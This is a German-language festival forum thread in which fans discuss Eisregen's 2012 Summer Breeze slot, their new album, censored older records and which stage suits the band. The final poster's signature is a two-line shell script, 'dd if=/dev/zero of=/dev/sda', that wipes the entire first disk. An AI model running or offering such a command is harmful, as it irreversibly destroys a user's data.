EISREGEN

Diskutiert hier über die Bands 2012! Talk about the Bands 2012!

Moderator: Moderatoren

Benutzeravatar
Phantom777
Beiträge: 260
Registriert: 13. Sep 2009, 00:00

Re: EISREGEN

Beitrag von Phantom777 » 16. Dez 2011, 11:22

Ja doch, wenn zeitgleich nichts besseres spielt, schau ich vorbei :)

Benutzeravatar
kügelchen
Beiträge: 38
Registriert: 9. Dez 2011, 00:00

Re: EISREGEN

Beitrag von kügelchen » 16. Dez 2011, 19:27

Pfuibäbäh

Benutzeravatar
Yeti39
Beiträge: 100
Registriert: 5. Jan 2010, 00:00
Wohnort: Fränkische

Re: EISREGEN

Beitrag von Yeti39 » 16. Dez 2011, 20:32

nö, brauch ich nicht!
Ich dachte ich wäre Atheist, bis ich merkte das ich Gott bin !

Benutzeravatar
TheIcon
Beiträge: 32
Registriert: 9. Dez 2009, 00:00
SUMMER BREEZE 2016: ja
Wohnort: Woinem

Re: EISREGEN

Beitrag von TheIcon » 19. Dez 2011, 10:49

Brauch ich beim besten willen net!
And here we go!

Benutzeravatar
tiNNo
Beiträge: 4
Registriert: 27. Aug 2011, 00:00

Re: EISREGEN

Beitrag von tiNNo » 19. Dez 2011, 12:51

werde ich mir anschauen :)
Rot'N'Roll!!!

Benutzeravatar
Knecht-Rupprecht
Beiträge: 148
Registriert: 14. Sep 2010, 00:00
SUMMER BREEZE 2016: ja
Wohnort: Moggendorf
Kontaktdaten:

Re: EISREGEN

Beitrag von Knecht-Rupprecht » 19. Dez 2011, 21:27

Also ich hör die neue Scheibe jetz schon 2 Tage rauf und runter und sie gefällt mir immer besser :) Is echt gut geworden, die ham sich sauber weiterentwickelt und ich muss sagen der Song Rostrot is mit das beste was Eisregen überhaupt gemacht hat!!! Absolut geil, typisch Eisregen und knüpft an "alte Zeiten" an :D

Ich freu mich wie ein Schnitzel das Ding endlich live zu hören :)
Ich bin intelligenter als meine saudumme Fresse vermuten lässt ;)

Benutzeravatar
Hose
Beiträge: 6
Registriert: 31. Dez 2008, 00:00

Re: EISREGEN

Beitrag von Hose » 21. Dez 2011, 10:50

Drujust hat geschrieben:hach ja, wenn sie alles was sie in den letzten 10 jahren produziert haben nicht spielen würden wären sie Bombe. Aber leider begnügen sie sich heute mit Liedern wie 'Kai aus der Kiste'...
Naja, beim Rest wirds wohl verdammt schwierig so wegen Zensur und so....Das ganz alte Zeug war sicher am besten, aber dafür stehts ja auch aufm Index...;)

Ich werd sie mir auf jeden Fall anschauen, aber BITTEBITTEBITTE nicht mehr auf der Party-Stage!!!!!!!!!! Ich konnte am Ende des Eisregen-Auftritts kaum mehr richtig atmen, es was sowas von stickig und falls wirklich etwas passiert wäre, glaube ich kaum, dass die Sanis durch die Menschenmenge rechtzeitig an Ort und Stelle gewesen wären....

Deshalb: Auf jeden Fall Pain-Stage!!!!! ;)
Trockenfutter, Dosenbier
auf Festivals, das lob ich mir!

Benutzeravatar
VladTepes
Beiträge: 1556
Registriert: 27. Mai 2007, 00:00

Re: EISREGEN

Beitrag von VladTepes » 21. Dez 2011, 13:28

Hose hat geschrieben:
Drujust hat geschrieben:hach ja, wenn sie alles was sie in den letzten 10 jahren produziert haben nicht spielen würden wären sie Bombe. Aber leider begnügen sie sich heute mit Liedern wie 'Kai aus der Kiste'...
Naja, beim Rest wirds wohl verdammt schwierig so wegen Zensur und so....Das ganz alte Zeug war sicher am besten, aber dafür stehts ja auch aufm Index...;)
Naja, Leichenlager und Zerfall stehen nicht auf dem Index. Man wird sehen, was gespielt wird.

Benutzeravatar
glas
Beiträge: 348
Registriert: 22. Aug 2011, 00:00
SUMMER BREEZE 2016: ja
SUMMER BREEZE 2017: ja
SUMMER BREEZE 2018: ja
SUMMER BREEZE 2019: ja
Wohnort: Tower B

Re: EISREGEN

Beitrag von glas » 21. Dez 2011, 15:03

Knecht-Rupprecht hat geschrieben:Also ich hör die neue Scheibe jetz schon 2 Tage rauf und runter und sie gefällt mir immer besser :) Is echt gut geworden, die ham sich sauber weiterentwickelt und ich muss sagen der Song Rostrot is mit das beste was Eisregen überhaupt gemacht hat!!! Absolut geil, typisch Eisregen und knüpft an "alte Zeiten" an :D

Ich freu mich wie ein Schnitzel das Ding endlich live zu hören :)
is net dein ernst? bin sogar weng enttäuscht vom album. kathi das kuchenschwein, was soll der mist? :o zauberelefant ist da noch besser, die Thematik is ja ähnlich

Benutzeravatar
Knecht-Rupprecht
Beiträge: 148
Registriert: 14. Sep 2010, 00:00
SUMMER BREEZE 2016: ja
Wohnort: Moggendorf
Kontaktdaten:

Re: EISREGEN

Beitrag von Knecht-Rupprecht » 21. Dez 2011, 15:12

glas hat geschrieben:
Knecht-Rupprecht hat geschrieben:Also ich hör die neue Scheibe jetz schon 2 Tage rauf und runter und sie gefällt mir immer besser :) Is echt gut geworden, die ham sich sauber weiterentwickelt und ich muss sagen der Song Rostrot is mit das beste was Eisregen überhaupt gemacht hat!!! Absolut geil, typisch Eisregen und knüpft an "alte Zeiten" an :D

Ich freu mich wie ein Schnitzel das Ding endlich live zu hören :)
is net dein ernst? bin sogar weng enttäuscht vom album. kathi das kuchenschwein, was soll der mist? :o zauberelefant ist da noch besser, die Thematik is ja ähnlich
Ja :D die Kathi kannste voll in die Tonne treten.. aber sind genug Kracher auch drauf.. Rostrot, Madenreich, und auf der Madenreich Ich,Zombie...
Ich bin intelligenter als meine saudumme Fresse vermuten lässt ;)

Benutzeravatar
Knecht-Rupprecht
Beiträge: 148
Registriert: 14. Sep 2010, 00:00
SUMMER BREEZE 2016: ja
Wohnort: Moggendorf
Kontaktdaten:

Re: EISREGEN

Beitrag von Knecht-Rupprecht » 21. Dez 2011, 15:24

VladTepes hat geschrieben:
Hose hat geschrieben:
Drujust hat geschrieben:hach ja, wenn sie alles was sie in den letzten 10 jahren produziert haben nicht spielen würden wären sie Bombe. Aber leider begnügen sie sich heute mit Liedern wie 'Kai aus der Kiste'...
Naja, beim Rest wirds wohl verdammt schwierig so wegen Zensur und so....Das ganz alte Zeug war sicher am besten, aber dafür stehts ja auch aufm Index...;)



Was heist "begnügen" sich mit Kai aus der Kiste,.. ich find den Kai nich schlecht! Klar sind die alten Sachen von Eisregen besser aber ich muss sagen ich mag Eisregen für den Dark-Metal den sie spieln und nicht nur wegen der Texte.

Hab sie heuer im Sommer auf nem kleinem Festival gesehn und war echt überrascht!! Die ham da alles gespielt was Gott verboten hat :D mit Ausnahme dass der Ripper aus Rostock kam.. is glaub ich von Festival zu Festival verschieden..

Das einzige was mich ein bisschen stört is, villt hört sich das jetz für den einen oder andern krass an, ist dass ich immer mehr ein wenig Rammstein raushöre-> N8chtverzehr, Rostrot teilweise :) nicht nur weils an Rosenrot erinnert,...aber sonst find ich die neuen Sachen auch echt ganz kay :)
Ich bin intelligenter als meine saudumme Fresse vermuten lässt ;)

Benutzeravatar
Drujust
Beiträge: 373
Registriert: 4. Okt 2009, 00:00

Re: EISREGEN

Beitrag von Drujust » 21. Dez 2011, 16:12

beim letzten Auftritt haben sie jedenfalls kein Lied von einer indizierten Platte gespielt, was mit kleinen abänderungen des textes einfach zu machen wäre und was sie schon oft gemacht haben. Kai aus der Kiste findest du gut? Ich finde da eher Lieder wie Vorabend der Schlacht gut, wo ein Krieger vor der letzten Schlacht, die er am nächsten Tag streiten und dort auch fallen wird, noch einmal über sein Leben nachdenkt. Oder lieder wie Für euch die ihr lebt, in dem ein höher gestelltes Wesen auf die Menschheit blickt und erzählt, was diese alles für Sch.... Mist anstellt. Find ich von der Thematik einfach interessanter als ein Kind, der im Schuhkarton aufwächst :roll:
Summer Breeze, Winter Freeze, Spring Disease und Autumn Cheese ;)

Danke für: Agrypnie, Alcest, Ahab, Be'lakor, Black Sun Aeon, Ghost Brigade und viele andere

Benutzeravatar
glas
Beiträge: 348
Registriert: 22. Aug 2011, 00:00
SUMMER BREEZE 2016: ja
SUMMER BREEZE 2017: ja
SUMMER BREEZE 2018: ja
SUMMER BREEZE 2019: ja
Wohnort: Tower B

Re: EISREGEN

Beitrag von glas » 21. Dez 2011, 16:21

Knecht-Rupprecht hat geschrieben: Das einzige was mich ein bisschen stört is, villt hört sich das jetz für den einen oder andern krass an, ist dass ich immer mehr ein wenig Rammstein raushöre-> N8chtverzehr, Rostrot teilweise :) nicht nur weils an Rosenrot erinnert,...aber sonst find ich die neuen Sachen auch echt ganz kay :)
an den vergleich mit rosenrot hab ich als erstes auch gedacht, als ich gehört hab, dass sie n neues album rausbringen. Nunja mich störts nicht. Rammstein ist meine Lieblingsband(werd wahrscheinlich dafür gleich gekreuzigt xD). Sie haben schon viel gemeinsam. Das rollende R ist typisch für beide bands und beide widmen sich einer düsteren Thematik, wie es sonst nur wenige Bands tun. Trotzdem liegen meilen zwischen den Bands ;)

Benutzeravatar
Knecht-Rupprecht
Beiträge: 148
Registriert: 14. Sep 2010, 00:00
SUMMER BREEZE 2016: ja
Wohnort: Moggendorf
Kontaktdaten:

Re: EISREGEN

Beitrag von Knecht-Rupprecht » 21. Dez 2011, 22:28

Drujust hat geschrieben:beim letzten Auftritt haben sie jedenfalls kein Lied von einer indizierten Platte gespielt, was mit kleinen abänderungen des textes einfach zu machen wäre und was sie schon oft gemacht haben. Kai aus der Kiste findest du gut? Ich finde da eher Lieder wie Vorabend der Schlacht gut, wo ein Krieger vor der letzten Schlacht, die er am nächsten Tag streiten und dort auch fallen wird, noch einmal über sein Leben nachdenkt. Oder lieder wie Für euch die ihr lebt, in dem ein höher gestelltes Wesen auf die Menschheit blickt und erzählt, was diese alles für Sch.... Mist anstellt. Find ich von der Thematik einfach interessanter als ein Kind, der im Schuhkarton aufwächst :roll:
Naja du müsstet den Text vielleicht ein klein wenig mehr hinterfragen, Kai aus der Kiste handelt nicht nur einfach von einem dämlichen kleinen Jungen der in nem Schuhkarton aufwächst, der Text ist schon auch gesellschaftskritisch und richtet sich gegen Gewalt an Kindern..
Ich bin intelligenter als meine saudumme Fresse vermuten lässt ;)

Benutzeravatar
Kaugummigolf
Beiträge: 543
Registriert: 14. Aug 2005, 00:00
Wohnort: Irgendwo im Spätzlefresserland

Re: EISREGEN

Beitrag von Kaugummigolf » 21. Dez 2011, 23:16

Wahren aufm Wolfzeit geil
Vater und kann immer noch nicht von den Festivals lassen. Mer wird aber ruhiger.

Überlebt Breeze 05/06/07/08/09/10/11 so und jetzt mal ab nach WACKEN..so 2012 Wacken überlebt 2014 Rock Harz Summer Breeze wie es früher einmal wahr ! Geil.

Benutzeravatar
Drujust
Beiträge: 373
Registriert: 4. Okt 2009, 00:00

Re: EISREGEN

Beitrag von Drujust » 22. Dez 2011, 01:09

Knecht-Rupprecht hat geschrieben:
Drujust hat geschrieben:beim letzten Auftritt haben sie jedenfalls kein Lied von einer indizierten Platte gespielt, was mit kleinen abänderungen des textes einfach zu machen wäre und was sie schon oft gemacht haben. Kai aus der Kiste findest du gut? Ich finde da eher Lieder wie Vorabend der Schlacht gut, wo ein Krieger vor der letzten Schlacht, die er am nächsten Tag streiten und dort auch fallen wird, noch einmal über sein Leben nachdenkt. Oder lieder wie Für euch die ihr lebt, in dem ein höher gestelltes Wesen auf die Menschheit blickt und erzählt, was diese alles für Sch.... Mist anstellt. Find ich von der Thematik einfach interessanter als ein Kind, der im Schuhkarton aufwächst :roll:
Naja du müsstet den Text vielleicht ein klein wenig mehr hinterfragen, Kai aus der Kiste handelt nicht nur einfach von einem dämlichen kleinen Jungen der in nem Schuhkarton aufwächst, der Text ist schon auch gesellschaftskritisch und richtet sich gegen Gewalt an Kindern..
das war von mir jetzt schon bewusst etwas überspitzt dargestellt, jedoch sind ihre neuen Lieder einfach zu lächerlich aufgeblasen um ernst genommen zu werden oder um irgendetwas sinnvolles beizutragen. Ich kann ja auch sagen mit Zauberelefant üben sie kritik an der zunehmenden Fettleibigkeit der Menschen... belanglose themen wenn man bedenkt, mit was sie sich früher beschäftigt haben, wie Kriege, Katastrophen, Gewalt, Krankheitsepidemien, etc.
Summer Breeze, Winter Freeze, Spring Disease und Autumn Cheese ;)

Danke für: Agrypnie, Alcest, Ahab, Be'lakor, Black Sun Aeon, Ghost Brigade und viele andere

Benutzeravatar
Lordamoun
Beiträge: 80
Registriert: 28. Jul 2009, 00:00
SUMMER BREEZE 2016: ja
Wohnort: Ludwigsburg

Re: EISREGEN

Beitrag von Lordamoun » 22. Dez 2011, 01:30

dasFloh hat geschrieben:Aber bitte nicht wieder im Partyzelt :roll: Dafür zieht die Band einfach zu viele Leute an.


Ja ! und ab liebsten auf der MAIN[/img]Bild
Am 8. Tag schuf Gott das Bier und seit dem hört man nichts mehr von ihm.

Benutzeravatar
Naturbursche
Beiträge: 31
Registriert: 15. Jan 2010, 00:00
Wohnort: Tromaville

Re: EISREGEN

Beitrag von Naturbursche » 28. Dez 2011, 13:28

Kann ich nur zustimmen. Nicht im Zelt bitte -.-
SB 2012: Opeth, My dying Bride, Dornenreich, Ghost, Crashdiet, Blind Guardian, Airbourne, Hardcore Superstar, Riger, Bloodbath, Motörhead, Six Feet Under, Wormrot, Dead,

Benutzeravatar
Nersuhl
Beiträge: 1305
Registriert: 17. Aug 2009, 00:00
Wohnort: Ffm

Re: EISREGEN

Beitrag von Nersuhl » 28. Dez 2011, 16:09

Neues Zelt -> besser als die Main.
"Promises like dry grains in my hands - searching for a drop of water"

Benutzeravatar
Skarrg
Beiträge: 2342
Registriert: 25. Mai 2008, 00:00
SUMMER BREEZE 2016: ja
Wohnort: Zürich

Re: EISREGEN

Beitrag von Skarrg » 28. Dez 2011, 16:13

Nersuhl hat geschrieben:Neues Zelt -> besser als die Main.
/sign
Bilanz 2012: 13/3/11
Bilanz Tippspiel 2012: 0 -.-
348 km away from Summer Breeze!

Benutzeravatar
EisregenLea
Beiträge: 11
Registriert: 25. Dez 2010, 00:00
SUMMER BREEZE 2016: ja
Wohnort: Waldtann
Kontaktdaten:

Re: EISREGEN

Beitrag von EisregenLea » 28. Dez 2011, 23:16

Ich hoffe auch, dass sie nicht wieder im Partyzelt spielen & vorallem nicht wieder zu so einer beschissenen Zeit wie 2010.
Möchte nicht wieder einen Headliner verpassen.

Aber tierisch geil, dass sie kommen,
freu mich riesig :hello1:
17 Km to SUMMER BREEZE

Benutzeravatar
Wall
Beiträge: 5
Registriert: 21. Aug 2011, 00:00

Re: EISREGEN

Beitrag von Wall » 2. Jan 2012, 17:17

Sehr sehr sehr gut! Auch wenn ich Rostrot jetzt nicht so gut finde, ich hoffe mal das sie mehr alte Sachen spielen.
Aber dieses Jahr bitte nicht im Party Zelt die Band ist viel zu bekannt und zu geil, die muss auf Main oder Pain!
Bild

Benutzeravatar
Mondstille
Beiträge: 9
Registriert: 24. Okt 2010, 00:00

Re: EISREGEN

Beitrag von Mondstille » 3. Jan 2012, 14:23

Hey.
Wall hat geschrieben:Aber dieses Jahr bitte nicht im Party Zelt die Band ist viel zu bekannt und zu geil, die muss auf Main oder Pain!
Auch wenn ich ein Fan von Eisregen bin, kann ich sie mir beim besten Willen nicht auf eine der Stages vorstellen. Zumal sich das Zelt letztes Jahr immens vergrößert hat, und sie da auch wirklich besser reinpassen ... Ihr dürft also nicht immer mit dem vor 2 Jahren ausgehen. Wie gesagt - das Zelt wurde vergrößert/verbessert.

Ansonsten freu ich mich bzgl. der Bestätigung natürlich. :)

LG, Andü

Benutzeravatar
Thulcandra
Beiträge: 8
Registriert: 3. Aug 2011, 00:00

Re: EISREGEN

Beitrag von Thulcandra » 27. Jan 2012, 14:04

In Österreich einmalig, nur wirds wohl in Deutschland an der Songauswahl scheitern...
IRON MAIDEN \m/

Benutzeravatar
no.human.being
Beiträge: 420
Registriert: 26. Sep 2009, 00:00
SUMMER BREEZE 2016: ja
Wohnort: Augsburg

Re: EISREGEN

Beitrag von no.human.being » 31. Jan 2012, 22:59

Also als die letztes mal im Zelt gespielt haben war's auch schon sehr sehr groß und trotzdem ham noch massenhaft Leute außerhalb gestanden. Das klingt jetzt vielleicht nach ner naiven Idee, aber kann man die Zeltplane in so einem Fall nicht komplett "hochkrämpeln" rundherum, sodass die Leute außerhalb auch zumindest noch von überall was von der Band sehen/hören können? Wäre meiner Meinung nach ein guter Kompromiss. Oder würde das die Akustik zu sehr beeinträchtigen wegen "Störungen" von den beiden Hauptbühnen?
#!/bin/sh
dd if=/dev/zero of=/dev/sda

Antworten

Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 2 Gäste